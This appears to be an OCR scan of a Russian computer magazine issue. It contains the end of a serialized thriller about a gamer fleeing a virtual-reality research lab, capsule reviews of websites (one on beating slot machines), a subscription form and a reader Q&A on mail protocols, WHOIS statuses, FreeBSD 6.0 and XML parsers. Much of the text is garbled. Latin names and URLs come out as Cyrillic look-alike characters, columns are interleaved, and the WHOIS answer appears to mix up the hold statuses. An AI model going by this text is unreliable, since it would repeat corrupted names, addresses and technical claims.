— Олег Николаевич, все готово. Прошу. 

Они подошли к машине. Сбоку находилось игровое кресло с присоеди- 
ненным шлемом виртуальной реальности. 

— Присаживайтесь, — предложил ученый. 

Андрей, не двигаясь, смотрел на непонятную машину. 

— Давай, Андрей. Помни, мы тут для того, чтобы найти ответы на вопро- 
сы, которые нас обоих беспокоят. 

В итоге Андрей решился и устроился в кресле. Седой профессор надел на 
его голову каркас, с торчащими из него проводками. Металлические 
штырьки сдавили кожу и вызвали неприятное чувство. Ученый одел на 
его ноги браслеты с такими же проводами и стал подключать браслеты к 
рукам. Андрей ощутил себя смертником, которого вот-вот должны поджа- 
рить на электрическом стуле. Все вокруг казалось одной из фантазий Ме- 
зы. Если они с ним что-то сделают, то он уже не сможет очнуться. 

Он посмотрел на Олега Николаевича и уловил что-то нехорошее в его 
взгляде. Так смотрят на осу, которая мучается в агонии после того, как те- 
бя ужалила. Она умирает, но тебе ее нисколько не жаль. Ты испытываешь 
удовлетворение от ее агоний. 

Он шевельнул рукой и нащупал в кармане смятую записку. «Не верь им. 
Беги!». Глупо было верить немой 8-летней девочке. Он вспомнил ее же 
слова на острове: «Слушайся меня. Обязательно». Все это было очень 
странно. Ему сказали, что Меза — это фантазии. Но как он мог нафанта- 
зировать девочку, которую впервые встретил только некоторое время 
спустя? Причем с поразительной точностью. 

— Я не буду этого делать! 

Ученый, уже подключивший к руке один из браслетов, с удивлением пос- 
мотрел на него. 

— Выпустите меня. Я не буду принимать участия в ваших экспериментах! 
- крикнул Андрей и стал срывать с себя провода. 

— Будешь, куда ты денешься, — изменившимся голосом ответил Олег 
Николаевич. Он кивнул сотрудникам, и те бросились к Андрею. На раз- 
мышления времени не оставалось. Сорвав с головы каркас, Андрей укло- 
нился от одного из нападающих и бросился к двери. В коридоре ему 
навстречу кинулся еще один человек, но Андрей оказался проворнее. 

— Держите его! — услышал он крик сзади себя, и что есть мочи кинулся бе- 
жать по коридору. Одна из дверей за поворотом была приоткрыта — воз- 
можно, это был единственный шанс. Он забежал в кабинет и захлопнул за 
собой дверь, прислонившись к ней и переводя дух. Кабинет был пуст. 

— Он в одном из кабинетов, — услышал Андрей голос Олега Николаеви- 
ча. Проверьте все помещения на этом этаже. 

Нужно было срочно что-то предпринять. Дверь могла задержать их нена- 
долго. Андрей подошел к окну и посмотрел вниз. Второй этаж. Если по- 
виснуть, держась за что-то, можно смягчить прыжок. 

Андрей снял футболку, скрутил ее в канат и, основательно обвязав один ко- 
нец вокруг оконного выступа, взявшись за другой, осторожно перевесился 
через край. Мысленно почитав до трех, он отпустил руки и рухнул вниз. 

. — . * * * 

* 

СО 

Заскочив в магазин «Сэконд Хенд», который оказался по пути, Андрей ку- 
пил новую футболку и отправился к метро. Единственным человеком, ко- 
торый мог дать ответы на его вопросы, был теперь Жорик. Они столько 
лет дружили, но оказалось, что Андрей совсем его не знал. Зачем он все 
это время врал? Чем занимался во ВРИ? И что с ним случилось на самом 
деле? Это и предстояло выяснить. Позвонив домой другу, Андрей узнал у 
сестры, в какую больницу его отвезли. Потом спустился по эскалатору и 
о сел на нужный поезд. 

^ Андрей вспомнил, как первый раз познакомился с Жорой. Это было лет 6 
см назад. Андрей был гильдмастером одной из крупнейших русских гильдий 

^ Ыпеаде 2, Жорка — неопытным нубом, попросившимся в тильду. Не 

* прошло и года, как стал сильнейшим магом на сервере и офицером в 
21, Вигпіпд Рогсе. Потом они вместе перешли на ѴѴогІб оі ѴѴагсгаТС, вдвоем 



прокачивали персонажей, их новая гильдия первой на сервере убила 
Рагнароса — самого сложного босса в игре. Впервые в реале они встре- 
тились через 4 года. Андрей шел на эту встречу, как на первое свидание. 
Он уже давно считал Жорку своим другом, но одно дело общаться в вир- 
туальных мирах, другое — разговаривать с реальным собеседником. 
Вдруг им будет не о чем говорить? При мысли об этом у Андрея начался 
мандраж. Но неловкая пауза при встрече продлилась до первой затрону- 
той темы об играх. После этого горячие споры и обсуждения не прекра- 
щались ни на минуту. Так как онлайновые миры были единственным, что 
их связывало, то и говорить они могли только об этом. Андрей и Жора ни- 
когда не обсуждали девушек, фильмы, книги. Ничто это их, по большому 
счету, не интересовало. Даже когда Жора пригласил его на день рожде- 
ния, они весь вечер обсуждали стратегии РѴР и особенности классов в 
ѴѴогІб оі ѴѴагсгаК. 

Андрей отвлекся от мыслей о прошлом и стал разглядывать людей в ва- 
гоне. Интересно, нравится ли им их жизнь? Например, этой мрачной те- 
теньке, прижимающей к коленям сумочку и устало глядящей в пол. Или 
пареньку в кепке, темных очках и с плеером в ушах. Тем девицам, погля- 
дывающим на него и о чем-то со смехом перешептывающимся. И смог- 
ли бы они вернуться в реал, если бы познали все прелести виртуальной 
жизни? Андрей сомневался, что они вообще способны их познать. 

И снова появилось это чувство... как будто за тобой следят. Буквально 
просверливают спину взглядом. Андрей обернулся и от изумления отк- 
рыл рот. На другом конце вагона стояла она. Он не знал, как ее называть. 
Александра или Кристи? Но это была та самая девочка с острова, кото- 
рая позже передала ему записку. Она смотрела на него не отрываясь, с 
абсолютно ничего не выражающим лицом. 

Андрей словно очнулся и принялся пробираться к ней, стараясь не упус- 
тить из виду. Но в этот момент поезд остановился на очередной станции 
и поток людей смешался. Его отодвинули обратно в середину вагона, и он 
только успел краем глаза заметить, как девочка вышла. Поезд снова дви- 
нулся дальше и через окно он увидел, как она стоит и смотрит ему вслед. 
Все это было похоже на дурной сон или японский фильм ужасов: там то- 
же девочки появляются из ниоткуда и уходят в никуда. И смотрят, прони- 
зывая тебя взглядом насквозь. 

Андрей еще раз осмотрел людей в вагоне. Ничего подозрительного: зна- 
комых лиц больше не было, и никто на него не обращал внимания. 
Внезапно свет в вагоне погас. 

Андрей услышал, как поезд резко стал тормозить и, наконец, остановил- 
ся. Поразительнее всего было то, что никто вокруг не издал ни звука. Ва- 
гон, полный людей и погруженный во мрак, молчал. Ни паники, ни кри- 
ков, ни предположений о том, что случилось. Ничего. Он слышал, как в 
этом дьявольском безмолвии громко стучит его сердце. Люди, которые 
еще недавно были людьми, превратились в безжизненных манекенов. И 
он не мог даже рассмотреть их. 

Андрею стало страшно. Девочку в поезде еще можно было объяснить. 
Можно было объяснить остановку поезда и выключенный свет. Но тако- 
го не бывает, чтобы в таких ситуациях никто не проронил ни звука. 
Андрей замер, стараясь не дышать, и почувствовал, как по спине стека- 
ет капелька холодного пота. 

Через секунду раздался толчок, и поезд двинулся с места. В вагоне поя- 
вился свет, и люди снова стали живыми людьми, общаясь как ни в чем 
не бывало. Как будто ничего не произошло. 

Когда поезд остановился у станции, Андрей вздохнул с облегчением и выс- 
кочил наружу. По крайней мере, наверху он будет в большей безопаснос- 
ти. Он еще раз оглянулся на мистический поезд. Но «фильм ужасов» еще 
не закончился. ВСЕ люди, находящиеся в вагоне, СМОТРЕЛИ НА НЕГО. 

* * * 

Андрей поднялся по эскалатору и спросил у продавщицы пирожков, где 
находится больница. Через квартал. Андрей понимал, что идти туда было 
опасно, люди из ВРИ могли его там поджидать. Но домой возвращаться 
было еще опаснее, к тому же ему необходимо было поговорить с другом. 
Задумавшись, Андрей не заметил, как эта цыганка выскочила прямо пе- 
ред ним. 

— Позолоти ручку, красивый. Правду скажу! 

Андрей обошел ее, всем своим видом показывая, что ему неинтересно. 

— Яхонтовый, вижу беспокойство в тебе. Знаю причину. Хочешь узнать, 
где искать, что ищешь? Позолоти ручку. 

Андрей не останавливался. 

— Беда с кем-то из близких случилась! Все вижу! Все знаю! Позолоти 
ручку, мудрый совет подскажу. 

— Отстань. Некогда! — рявкнул Андрей и ускорил шаг. 

— Не ходи туда! Сверни с пути! — сетовала цыганка вслед, но Андрей ее 
уже не слушал. 

Словно для подтверждения ее слов, дорогу перебежала черная кошка. 
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Сделав это, она остановилась и обернулась на него. Выразительно мяук- 
нула, словно что-то хотела сказать, и побежала дальше. 

На перекрестке загорелся красный свет, Андрей остановился, периоди- 
чески посматривая по сторонам. Ощущение слежки не покидало его. 
Может, материал для досье собирался и сейчас? Андрей смотрел на 
проезжающие перед ним машины. Ему казалось, что вот-вот в одной из 
них он увидит лицо Кристи или Олега Николаевича. Но что-то долго не 
включался зеленый. Он уже стоял перед переходом больше минуты. 
Светофор даже не думал переключать свет. 

Ведомый каким-то внутренним чувством, Андрей пропустил машину и вы- 
бежал на дорогу, лавируя между проезжающими и сигналящими иномар- 
ками. Послышался визг тормозов, лица водителей ярко выражали все, что 
они о нем думали... но обошлось. Оказавшись на другой стороне дороги, 
Андрей двинулся дальше. До больницы оставалось не больше 300 метров. 

— Эй, курить есть? 

Путь перекрыл здоровенный амбал. Андрей хотел обойти его, но амбал 
остановил. 

— Эй, я с тобой, сука, разговариваю! Чо, глухой? 

— Извините, я спешу, — тихо ответил Андрей. 

— Никуда не пойдешь, мы с тобой еще не закончили. А-ну выворачивай 
карманы! — скомандовал мужик. 

Андрей осмотрел улицу в поисках помощи, но никого рядом не было. 
Только несколько ларьков вдали, рядом с которыми виднелись покупате- 
ли, и девица на другом конце дороги. 

— На меня смотри, никто тебе не поможет, урод! 

Андрей глянул за спину амбалу и, показав туда пальцем, громко крикнул: 
«Милиция!». Амбал на секунду опешил, оглянулся, и этого было достаточ- 
но, чтобы Андрей выскользнул и пустился наутек. У него уже не было вре- 
мени подумать, что такое дерзкое ограбление днем в центре города было 
странным, да и на фоне остального этот эпизод был не самым ярким. 

— Помогите! — услышал он женский крик. 

Кричала та самая девица, которую он видел несколькими мгновениями 
ранее. 

— Молодой человек, помогите! Я, кажется, ногу вывихнула! 

Она лежала на тротуаре, схватившись за щиколотку. Лицо отображало 
гримасу боли. 

— Пожалуйста! — повторила она. 

Это было уже слишком. Как будто все вокруг пыталось остановить его, 
заставить свернуть с намеченного пути. Совпадение? Или они все за- 
одно? Андрей не стал разбираться, и, стараясь не думать, что поступа- 
ет не по-мужски, побежал дальше, не обращая внимания на жалобные 
женские крики. 

Вот и больница. 



Он вбежал по ступенькам, открыл дверь, и только внутри перевел дух. 

* * * 

Больница была совершенно обычной. Хотя сейчас бы Андрей не удивил- 
ся, даже если бы на стенах в коридоре были написаны строчки из Библии 
человеческой кровью. Он прошел в отдел регистрации и спросил, в какой 
палате находится друг. 

Поднявшись на третий этаж, он нашел нужную цифру. 

— Вы к кому? — поинтересовалась проходящая медсестра. 

— К Георгию Ершову. 

— А вы ему кто? 

— Я друг. 

— Простите, но мы пока разрешаем посещения к нему только родствен- 
никам. Он все еще находится в очень тяжелом состоянии. 

— С ним все будет в порядке? 

— Значительная часть кожи поражена, но со временем он поправится. 

— Можно мне его хотя бы увидеть. Очень нужно, пожалуйста. 

— Мы не разрешаем посещения... 

— Я понял, — прервал Андрей. — Но я ему, как родственник. Я не буду 
его переутомлять, честное слово. Мне действительно нужно. 

Медсестра секунду поколебалась, но сдалась. 

— Хорошо, только на одну минутку. 

Они вошли в палату. 

Койка была пуста. 

— Где он? 

По лицу медсестры он понял, что для нее самой исчезновение пациента 

— неожиданность. 

— Только недавно был здесь. 

Медсестра выбежала за помощью, а Андрей пошел к выходу. Он был 
уверен, что без «ВР Инсайд» и Олега Николаевича тут не обошлось. Что 
делать теперь, он не знал. 

В кармане завибрировал мобильник. Андрей не ждал ни от кого звонка, 
и когда достал телефон из кармана, то сразу же посмотрел на имя зво- 
нившего. 

Жорка. 

— Алло? — с волнением ответил Андрей. 

— Привет, друг. Если хочешь узнать, что происходит, то ровно через 2 
часа приходи в нашу кафешку. Я буду тебя ждать. 

В трубке раздались короткие гудки. 

Продолжение следует © 
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.... ШІІѢ 

Иван Скляров (ѵѵѵѵѵѵ.зкІуагоК.ги) 

Иван Кузнецов ака Зеей (зеесІ@п5к.ги) 



Апіі-Маіісіоиз 

Зоііѵѵаге 

\ллллл/.ап1і-таІ\л/аге.ги 

Термин Апй-Маіѵѵаге является сокращением от Апй- 
Маіісіоиз ЗоГСѵѵаге, что в переводе на человеческий 
означает программное обеспечение для защиты от 
вредоносного кода, враждебных или несанкциони- 
рованных действий. Поэтому несложно догадаться 
о чем этот сайт. Новости, публикация информации 
о текущих и возможных видах угроз, аналитика, 
анализ различных технологий защиты и решений 
на их основе, форумы, полезные ссылки и все свя- 
занное с защитой от вирусов, спама, фишинга, 
шпионских и других вредоносных программ. 

Взлом игровых 
автоматов 

ѵ\лллл/.а1топіс.пе1ги 

Типичная картина в любом городе России: стоит 
игровой автомат где-нибудь в продуктовом мага- 
зине, подходит бабка и кидает в него пятаки до 
тех пор, пока не перекидает всю свою пенсию. 
Более того, народ даже встает в очередь, чтобы 
расстаться со своими кровными! А количество 
казино в любом более-менее крупном городе 
уже превышает число музеев! На этом сайте ты 



ва;?ш тжурнап 

Ш ІтНр://о$а.гоо^а.іп1Ъ 

Довольно интересный е-гіпе, судя по приставке 
ІІА, созданный хохлами. Материалы в журнале в 
основном с уклоном в *МХ, например: беспа- 
рольная аутентификация по ключу через 
рат_изЬ, розйіх за 10 минут, простой ОЫЗ-сер- 
вер для локальной сети, ФИДО поинт-станция, 
во РгееВЗБ через ТСР, контра под Линукс, орга- 
низация сетевого доступа сотрудников офиса к 
сканеру, РигеРТРб у Вас на службе, АрасНе2 и 
его друзья, полезные РНР-скрипты и т.п. 



Сообщество 

экспертов 

] ѵууууу.героіі'.ги 

ВерогТги — интернет-проект, объединяю- 
щий в себе специалистов из разных облас- 
тей человеческой деятельности. Например, 
в разделе «Компьютеры и Интернет» уже 
открыты такие темы, как «Сетевая безопас- 
ность», «Хакеры», «Кибертерроризм», 
«Нопеуроіз», «Защита прав личности в Ин- 
тернете» и многие другие. Ведущий создает 
библиотеку описаний лучших сетевых ре- 



узнаешь во всех технических деталях о том, как сурсов по теме, постит важные новости, пи- 
можно обыграть на крупные бабки многие виды шет статьи по интересным проблемам своей 
игровых автоматов. Для полноценного использо- темы, общается с посетителями на форуме, 
вания ресурса необходимо пройти регистрацию. Ты тоже можешь стать экспертом! 







Вычислительные 

методы 

и программирование 

[5] ИЦ-р://пит-те1-|п.5гсс.т5и.5и 

На этом сайте располагается электронный 
журнал «Вычислительные методы и програм- 
мирование». Это тебе не какой-нибудь е-2іпе 
от реал-хакерз-крю, а журнал от Научно-ис- 
следовательского вычислительного центра 
Московского государственного университета 
имени М.В. Ломоносова (МГУ). Поэтому если 
тебя не пугают такие названия статей, как 
«Коррекция крупномасштабного фона солнеч- 
ных допплерограмм» или «Вейвлет-регуляри- 
зация операции дифференцирования сигна- 
лов с шумом», то надевай свои очки с толсты- 
ми линзами и бегом на этот сайт. 

Фокус-покус! 

[6] ѵ\лллллтааіс$.ги 

Каждый из нас в детстве, насмотревшись 
по телевизору разных Сулейманов-Абдурах- 
манов, конечно же, больше всего на свете 
мечтал стать волшебником и по совмести- 
тельству немного фокусником. Мечты детства 
подсознательно остаются с нами. Поэтому 
сайт, посвященный волшебному и загадочно- 
му миру магии, будет немало интересен всем 
без исключения. Ресурс представляет собой 
просто кладезь различных секретов, тайн, те- 
орий и практик магического искусства. Боль- 
шой раздел по практической магии, магичес- 
кие советы, представленные в виде РАО, 
учебники магии «от А до Я», фокусы, трансли- 
руемые по ТѴ, — все это присутствует в боль- 
шом количестве. А для тех, кто захочет всерьез 
заняться этим искусством, на сайте ждет ма- 
газин, в котором можно совершить все необ- 
ходимые фокуснику покупки. 



Снимите 

это немедленно! 

Ц \ллллл/.идІус1ге$$.сот 

Совсем недавно в обзоре была ссылка на сайт 
о том, как знаменитости поглощают пищу. Пос- 
мотрели? Удивились? :) Сегодня речь пойдет 
немного о другом. По адресу і /ѵтѵ.идіусігезз.сот 
находится сайт, который представляет собой 
постоянно обновляемый виртуальный топ, обоз- 
ревающий самых дурно одевающихся звезд и 
не только. Необычный хит-парад составляется 
по нескольким критериям отстойности прики- 
дов. Худшая обувь, ужасающий подбор цветов 
одежды и сама одежда, прически, сопутствую- 
щие им аксессуары — все это выстроено по 
принципу топа и сопровождено соответствую- 
щими картинками и фотографиями, щ 







Олт 
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ЗАКАЗ ЖУРНАЛА В РЕДАКЦИИ 

«Хакер» +2 СО «Хакер» +0\Ю 





840р 


ЗА 6 МЕСЯЦЕВ 


990р 


ЗА 6 МЕСЯЦЕВ 


1830р 


ЗА 6 МЕСЯЦЕВ 


1620р 


ЗА 12 МЕСЯЦЕВ 


1920р 


ЗА 12 МЕСЯЦЕВ 


ЗбООр 


ЗА 12 МЕСЯЦЕВ 



Как оформить заказ? 

Ш Заполнить купон и квитанцию 
Ш Перечислить стоимость подписки через Сбербанк 
@ Обязательно прислать в редакцию копию оплаченной квитанции 
с четко заполненным купоном любым из перечисленных способов: 
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ЗАДАВАЯ ВОПРОС, ПОДУ- 
МАЙ! НЕ СТОИТ МНЕ ПОСЫ- 
ЛАТЬ ВОПРОСЫ, ТАК ИЛИ 
ИНАЧЕ СВЯЗАННЫЕ С ХА- 
КОМ/КРЭКОМ/ФРИКОМ — 
ДЛЯ ЭТОГО ЕСТЬ НАСК-РАО 
(НАСКРАС) @ ВЕАІ_. ХАКЕР. ВІІ), 
НЕ СТОИТ ТАКЖЕ ЗАДАВАТЬ 
ОТКРОВЕННО ЛАМЕРСКИЕ 
ВОПРОСЫ, ОТВЕТ НА КОТО- 
РЫЕ ТЫ ПРИ ОПРЕДЕЛЕН- 
НОМ ЖЕЛАНИИ МОЖЕШЬ 
НАЙТИ И САМ. Я НЕ ТЕЛЕ- 
ПАТ, ПОЭТОМУ КОНКРЕТИ- 
ЗИРУЙ ВОПРОС, ПРИСЫЛАЙ 
КАК МОЖНО БОЛЬШЕ 
ИНФОРМАЦИИ. 



атгтепЬ: 

Степан Ильин СіЛлХ Зі&Р? 

Іаа@,чшІ«оса&&р ли 



сиііел 



О: В чем разница между РОР и ІМАР протоко- 
лами, использование какого из них считается 
предпочтительнее? Долгое время юзал РОРЗ, 
но недавно очень сильно оскорбился, услы- 
шав от друга, что это уже прошлый век. . . 

А: Возможно, я тебя огорчу, но ты действи- 
тельно отстал от жизни. ІМАР — это более со- 
вершенный почтовый протокол, в котором 
исправили сразу несколько недостатков доб- 
рого старичка РОРЗ. Несмотря на одинаковое 
предназначение, ІМАР и РОРЗ используют 
кардинально различные концепции работы. 
Ключевое отличие заключается в том, что 
ІМАР хранит все сообщения на сервере, ски- 
дывая пользователю только заголовки, а по 
запросу — копию запрашиваемого сообще- 
ния. РОРЗ отдает все сообщения юзеру и по 
умолчанию уничтожает их на сервере. Конеч- 
но, и РОРЗ позволяет хранить сообщения на 
сервере и даже перед закачкой сообщений 
просматривать их заголовки, но сделано это 
настолько неудобно, что польза от подобной 
возможности представляется весьма сомни- 
тельной. Чтобы реально оценить преимущест- 
ва ІМАР, приведу пару жизненных примеров. 
Вот мне, например, нередко приходится рабо- 
тать сразу на нескольких компьютерах: до- 
машнем, рабочем, ноутбуке. Естественно, ус- 
танавливать почтовые клиенты на каждый из 
них довольно глупо. И не стоит закачивать поч- 
ту на каждом из них, так как в итоге может по- 
лучиться, что вся корреспонденция будет рас- 
средоточена на всех машинах, а на поиск нуж- 
ного письма будет уходить немыслимое коли- 
чество времени. Используя ІМАР, о подобной 
проблеме можно даже не задумываться. Еще 
одна проблема — спам. Закачивать сотни рек- 
ламных писем, которые ежедневно отправля- 



ются на наши редакционные ящики, довольно 
накладно. Значительно проще отсеять их на 
сервере и не загружать подобной ерундой дра- 
гоценный канал. Правда, подобный подход 
накладывает и некоторые ограничения. Боль- 
шинство бесплатных почтовых служб не могут 
позволить себе содержать корреспонденцию 
пользователей, а поэтому нередко предостав- 
ляют доступ исключительно по РОРЗ. С другой 
стороны, сервис ЗОдідз.сот предоставляет в 
распоряжение юзера аж 30 Гб. Так что исклю- 
чение есть из любого правила. 

О: В нашей домашней локалке праздник: ад- 
мин поднял выделенные серверы сразу для 
нескольких популярных игр. Это, конечно, за- 
мечательно, но для того, чтобы выяснить, иг- 
рает ли кто-нибудь на сервере или нет, при- 
ходится запускать нужную игру, а это очень 
неудобно. Быть может, существует универ- 
сальное средство, которое умеет мониторить 
серверы без запуска самих игр? 

А: Я бы удивился, если такого средства не было. 
Наиболее продвинутым программным решени- 
ем в области мониторинга игровых серверов по 
праву считается прога НІ_ЗѴѴ (ѵѵѵт.Ызѵѵ.сІе). По- 
пулярность тулза завоевала неслучайно: благо- 
даря своевременным обновлениям она умеет 
анализировать серверы для абсолютно всех 
современных игр. Среди них, например, свежие 
ВаШеІіеІсІ2, Оиаке 4, НаІТ І_іІе2. Я уже не говорю 
о старых-добрых (ЭиакеЗ и Соипіег-Зігіке. 
Возможно, тебе также понравится идея орга- 
низовать веб-сервер, динамически обновля- 
ющий статистику по активным серверам. 
В этом случае рекомендую воспользоваться 
плагином Сате Зегѵег Мопііог для известного 
ЗМЗ-движка РНР ІЧике ( ѵѵѵѵѵѵ.ріірпике.огд ) 




О: Какие мышки нынче используют про-геймеры? 
В подарок другу хочу приобрести реально крутой 
девайс, но не в курсе современных тенденций. 

А: Я давно понял, что на таких, казалось бы мело- 
чах, как клавиатура и мышь, не экономят. Дорогая 
клава Сііеггу и мегакрутой «грызун» І_одіІесІі 
МХ300, купленные несколько лет назад, работают 
у меня до сих пор. И знаешь, менять я их не соби- 
раюсь. Хотя сделать это очень захотелось, когда я 
прочитал обзоры І_оді1есІі МХ-510/518 (-45$, 800 
сірі), МісгозоК ІпІеІММоизе Ехріогег 4.0а (-20-25$, 
400 сірі), Рагег ОіатопсІЬаск Ргесізіоп (-65$, 1600 
сірі). Реальным хардкором можно назвать лазер- 
ную мышь І_одіІесіі 05 (2000 сірі), правда, стои- 
мость ее пока еще запредельная (-100$), но ре- 
ального профи это никогда не остановит. Если эти 
девайсы будет сложно найти в обычных магази- 
нах, набери их названия в «Яндексе» — и десятки 
онлайн-магазинов будут к твоим услугам. 

О: Что такое виртуальный оператор сотовой связи? 

А: Виртуальными операторами сотой связи принято 
считать компании, которые предоставляют клиентам 
полный спектр мобильных услуг, но в то же время не 
имеют собственной сетевой инфраструктуры. Впер- 
вые понятие МоЬіІе ѴігШаІ ІЧеІѵѵогк Орегаіог (МѴІМО) 
появилось несколько лет назад, когда предприимчи- 
вые европейцы стали заключать договоры с реаль- 
ными операторами о покупке эфирного времени для 
последующей перепродажи своим клиентам. 
Собственных радиочастотных ресурсов у них не бы- 
ло. Так же, как и проблем с миллиардным оборудо- 
ванием, расширением зоны покрытия сети, мороки с 
документами и лицензиями на предоставления сото- 
вой связи, которые получить сейчас практически не- 
реально. Преимущества очевидны. Для начала биз- 
неса не требуются миллиардные инвестиции: доста- 
точно умело перепродавать услугу, но делать это на- 



до с умом. Европейские МѴІЧО-операторы, которые 
занимают более 60% рынка, обычно имеют свою 
биллинговую систему (подсчет денег за потребляе- 
мые услуги), службу поддержки, ЗІМ-карты, офисы и 
т.п. Столь широкое распространение МѴІЧО получи- 
ли за счет введения более гибких и привлекательных 
тарифов, а также дополнительных услуг, до которых 
у настоящих операторов просто не доходили руки. 
Что касается России, то МѴІЧО пока у нас не при- 
жились, но тенденции в этой области намечаются. 
Не буду делать рекламу, но одна из крупнейших 
сетей салонов сотовой связи хочет попробовать 
себя в роли МѴІЧО-оператора. Хозяева идеи уве- 
рены, что у них все получится, и готовы вложить в 
эту затею немаленькие деньги. 

О: Слышал о том, что (Зоодіе предоставляет бесп- 
латный ѴРІЧ-сервис. Неужели это правда? 

А: После появления сервиса тарз.доодіе.сот 
(позволяет со спутника увидеть любую точку 
земного шара) мало что удивляет. Почему бы не 
предоставить массам свободный доступ в вирту- 
альную частную сеть? Известный поисковик 
действительно предоставляет ѴРІЧ-сервис, само 
собой, совершенно безвозмездно. Вернее ска- 
зать, предоставлял, так как на момент сдачи но- 
мера, соответствующий ресурс был в непробуд- 
ном дауне. Несколько часов в попытках получить 
заветный аккаунт не увенчались успехом, но, 
возможно, тебе повезет больше. Просто зайди 
на сайт Мірз://ѵрп.доодІе.сот/деіразз/ и укажи 
имя пользователя и пароль. Предвижу твой воп- 
рос по поводу анонимности сервера. Никакой 
приватности! Сервер публичный, поэтому адми- 
ны наверняка ведут логи. Впрочем, шифрование 
трафика осуществляется по всем правилам, так 
что ѴРІЧ от гугла можно смело использовать для 
маскировки своего трафика от провайдера. 



О: Когда запрашиваешь информацию о домене, 
ѴѴІіоІз-сервер возвращает табличку, состоящую из 
нескольких полей. Некоторые из них описывают 
информацию о владельце (абтіп), 0148-серверах и 
т.п. С этим все понятно, но как расшифровать зна- 
чения поля статус (ЗТАТІІ5)? Нередко встречаю 
совершенно разные значения этого поля. 

А: Прежде чем начать объяснение, разберемся с 
двумя понятиями: регистратор и регистратура. Ре- 
гистратура (гедізігу) — это специальная организа- 
ция, которая поддерживает конкретную доменную 
зону (например .сот). Регистратор (гедізігаг) — 
компания, которой разрешено регистрировать до- 
мены в этой зоне. 

АСТІѴЕ. Этот статус получают все новые домены 
по умолчанию. Регистратор имеет полный доступ к 
атрибутам доменам и может изменять их по свое- 
му желанию. Делегирование (обслуживание) тако- 
го домена может быть продлено. 

РЕОІЗТРУ-ЮСК. Слово І_ОСК указывает на то, 
что регистратор не имеет права изменять атрибу- 
ты домена и удалять, но может продлить делегиро- 
вание. Для того чтобы регистратор смог модифи- 
цировать параметры домена, необходимо, чтобы 
регистратора сняла статус РЕОІЗТРУ-ЮСК. 
РЕОІЗТРУ-НОиЭ. Этот статус так же, как и РЕО- 
ІЗТРУ-ЮСК, устанавливает регистратура. Атрибу- 
ты этого домена не могут быть изменены регистра- 
тором, но он может продлить его обслуживание. 
Разница между РЕОІЗТРУ-НОЮ и РЕОІЗТРУ- 
ЮСК заключается в том, что в первом случае ин- 
формация о домене помещается в 2опе Рііе (спе- 
циальная база данных, содержащая соответствие 
доменных имен и ІР-адресов), а во втором — нет. 
РЕОІЗТРАР-НОЮ. Именно этот статус обычно ста- 
вит регистратор. В этом случае контроль над доме- 
ном полностью ложится на владельца домена (то 
есть тебе, если домен зарегистрирован на тебя). 
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Сам же регистратор не может удалить и модифициро- 
вать параметры, но может продлевать обслуживание. 
ПЕОІЗТПАП-ЮСК. То же самое, что и ВЕОІЗТВАВ- 
НОШ, с той лишь разницей, что с этим статусом инфа 
о домене заносится в файл зон. В случае ВЕОІЗТВАВ- 
НОШ этого не происходит. 

ВЕОІЗТВѴ-ОЕІ_ЕТЕ-І\ЮТІРѴ. Такой статус может на 
время установить регистратура по истечению срока 
обслуживания домена. 

О: Собираюсь приобрести для своего КПК карту памяти 
формата Зесиге Оідііаі СагсІ. В характеристиках часто 
указывают скорость: 40х, 80х и даже ІЗЗх. Но что реаль- 
но обозначают эти цифры? Это действительно быстро? 

А: Если тебя интересует скорость в Кб/с, то просто ум- 
ножь указанное значение на 150. Если в наименова- 
нии карты указана скорость 80х, то надо 80x150 — по- 
лучается 12000 Кб/с. Впечатляет? Спешу тебя огор- 
чить: это лишь пиковая скорость, то есть максимум, 
который теоретически можно достичь. Реальная сред- 
няя скорость несколько ниже, но все равно более чем 
достаточна. Тем более для КПК. 

О: Совсем недавно вышла ОС РгееВЗЭ 6.0, и я очень 
обрадовался, увидев дистрибутив на вашем 0\ЛЭ. Те- 
перь возник вопрос: а стоит ли устанавливать ее на 
серверную машину? Как она ведет себя в плане ста- 
бильности и быстродействия? Сам я не новичок и вот 
уже долгое время использую версию 5.4, но все-таки 
хочу услышать твое мнение. 

А: Если говорить начистоту, то никаких революцион- 
ных изменений в РгееВЗО 6.0 нет. Отличия между 2, 
3, 4 и 5-ми ветками были воистину колоссальными, в 
то время как версии 5.4 и 6.0 вообще мало чем отли- 
чаются. Особенно если речь идет о рядовом пользо- 
вателе, который не лезет в дебри операционной сис- 
темы. В этом-то заключается и основной плюс свеже- 
го релиза: переход на новую ветку будет абсолютно 
безболезненным для тех, кто успешно использовал 
версию 5.4. Одно из ключевых изменений заключает- 



ся в оптимизации работы файловой системы и осо- 
бенно прямом доступе к диску. Файловая система те- 
перь является многопоточной, поэтому самые баналь- 
ные операции копирования между панелями в 
Місіпідііі Соттапсіег'е даже визуально стали быстрее. 
Еще одно новшество — усовершенствованная реали- 
зация ѴѴРА (ѴѴі-Рі Ргоіесіесі Ассезз), необходимая для 
обеспечения безопасности беспроводных сетей, 
а также поддержка целого ряда беспроводных карт. 
Аптайм системы на домашнем сервере — 2 недели. 
Так что могу смело утверждать, что увеличившаяся 
производительность никак не сказалась на стабиль- 
ности системы. РгееВЗО по-прежнему работает как 
часы, даже с кучей незначительных изменений, о ко- 
торых ты подробнее можешь прочитать в пресс-рели- 
зе — ѵѵѵѵѵѵ.ігееЬзсі. огд/геіеазез/б . 0Н/ге1по1ез -І386 .МтІ. 

О: В последнее время все больше начинаю осозна- 
вать прелести языка ХМІ_, но для использования необ- 
ходимо считывать данные и его структуру. Идея пи- 
сать свой собственный синтаксический анализатор 
совсем не прельщает — слишком сложно, да и не за- 
чем. Какие существующие реализации ХМЬпарсеров 
ты посоветуешь? 

А: Существует два вида парсеров. Анализаторы, отно- 
сящиеся к первому типу, используют йОМ-модель, 
смысл которой заключается в предварительном ана- 
лизе всего ХМЬдокумента. Полученные данные орга- 
низовываются в виде удобного дерева, перемещаясь 
по которому можно извлечь любую информацию. Этот 
подход считается эффективным только в случае не- 
больших ХМЬдокументов, так как дерево обычно по- 
мещается в оперативную память. Если же заранее 
предполагается, что работа будет осуществляться с 
объемными ХМІ_' ками, то разумнее использовать вто- 
рой тип анализаторов, базирующихся на ЗАХ-библио- 
теках (Зітріе АРІ Тог ХМІ_). Используемый ими подход 
основан на событиях. Парсер последовательно прос- 
матривает документ до тех пор, пока не произойдет 
затребованное событие (встретился определенный 



элемент, атрибут, значение атрибута), после чего 
должным образом реагирует на него. Например, изв- 
лекает нужные данные. 

Так что предлагаю тебе конкретные реализации пар- 
серов, разработанных на различных языках: 
стандартный МісгозоГС'овский парсер 
